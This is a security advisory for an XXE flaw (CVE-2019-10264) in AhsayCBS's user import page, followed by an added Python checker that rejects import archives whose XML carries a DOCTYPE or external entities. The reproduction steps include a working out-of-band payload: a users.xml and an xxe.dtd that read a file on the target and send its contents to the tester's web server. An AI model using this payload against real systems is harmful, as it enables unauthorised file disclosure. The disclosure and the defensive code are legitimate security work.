CVE-2019-10264 - XML External Entity (XXE)
Advisory
Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)
Technical details
To reproduce this we need a couple of things: a web server to serve xxe.dtd, and a web server to receive the target server's response (the same host can do both). First, create a zip file containing users.xml; users.xml must contain the following:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://172.16.238.1/xxe.dtd">
<settings>&send;</settings>
Then create the file xxe.dtd, which names the file we want to read and sends its content to our listening server:
<!ENTITY % file SYSTEM "file:///C:\\Program Files\\AhsayCBS\\version.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://172.16.238.1/?%file;'>">
%all;
Now we need to start a web server; I use Python for this, on my system 172.16.238.1. Run the following command in the directory containing the .dtd file:
python -m SimpleHTTPServer 80
This leaves a web server listening on port 80. Now, in the application, go to the “Move / Import / Export Users” page, choose the import users option and select the zip file we created.
Screenshot: importing the zip file and saving it.
Screenshot: when the save button is hit, our web server immediately receives a request for the DTD file. The DTD is then processed and the content of the target file, 8.1.0.50, is sent to our server.
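The root cause of this class of bug is on the parser side: an importer must never process a DOCTYPE or resolve external entities in a user-supplied users.xml. The following is an added example, not Ahsay's code and not part of the original advisory, of a pre-import check written in Python: it opens the uploaded zip, parses each XML member with expat configured never to load parameter entities, and flags a DOCTYPE declaration, any entity with a SYSTEM or PUBLIC identifier, or a reference to an entity the document does not define. The two sample files and the hostname example.invalid are constructed for the example; the malicious one has the same shape as the users.xml payload described above.

```python
import io
import zipfile
import xml.parsers.expat

# Constructed sample inputs (not taken from any real Ahsay export). The first has the
# same shape as the users.xml payload in the advisory; the second is a harmless file.
MALICIOUS_USERS_XML = (
    b'<?xml version="1.0" encoding="utf-8"?>\n'
    b'<!DOCTYPE data SYSTEM "http://example.invalid/xxe.dtd">\n'
    b'<settings>&send;</settings>\n'
)
BENIGN_USERS_XML = (
    b'<?xml version="1.0" encoding="utf-8"?>\n'
    b'<settings><user name="alice" role="backup"/></settings>\n'
)


def find_xxe_indicators(xml_bytes: bytes) -> list:
    """Parse xml_bytes with expat configured to fetch nothing and return a list of
    human-readable findings: a DOCTYPE declaration, any entity carrying a SYSTEM/PUBLIC
    id, and any reference to an entity the document does not define. An empty list
    means the document is plain XML and can be handed to the real import parser."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()
    # Never load parameter entities (i.e. the external DTD subset). This is expat's
    # default, set explicitly so the intent survives future edits.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append("DOCTYPE %r with external id %r" % (name, sysid or pubid))

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:
            prefix = "%" if is_param else "&"
            findings.append("external entity %s%s -> %r" % (prefix, name, sysid or pubid))

    def on_skipped_entity(name, is_param):
        # Expat reports a reference to an undefined entity here when an external DTD
        # was declared but not loaded, which is exactly the &send; case above.
        findings.append("reference to undefined entity &%s;" % name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.SkippedEntityHandler = on_skipped_entity
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError as exc:
        findings.append("not well-formed: %s" % exc)
    return findings


def vet_import_archive(zip_bytes: bytes) -> dict:
    """Inspect every .xml member of an import archive before it reaches the importer.
    Returns {member_name: findings}; reject the archive if any list is non-empty."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.filename.lower().endswith(".xml"):
                report[info.filename] = find_xxe_indicators(archive.read(info))
    return report


def archive_is_safe(zip_bytes: bytes) -> bool:
    return not any(vet_import_archive(zip_bytes).values())


def build_archive(users_xml: bytes) -> bytes:
    """Build an in-memory zip holding a single users.xml, the layout the import expects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("users.xml", users_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for label, payload in (("malicious", MALICIOUS_USERS_XML), ("benign", BENIGN_USERS_XML)):
        report = vet_import_archive(build_archive(payload))
        verdict = "REJECT" if any(report.values()) else "safe"
        print("%s archive -> %s %r" % (label, verdict, report))
```

The check is deliberately stricter than "block external entities": a legitimate users export has no reason to carry a DOCTYPE at all, so refusing any DOCTYPE removes the whole attack surface rather than enumerating dangerous declarations. AhsayCBS is a Java application; the equivalent hardening in a JAXP stack is to set the `http://apache.org/xml/features/disallow-doctype-decl` feature to true on the DocumentBuilderFactory or SAXParserFactory before parsing the import.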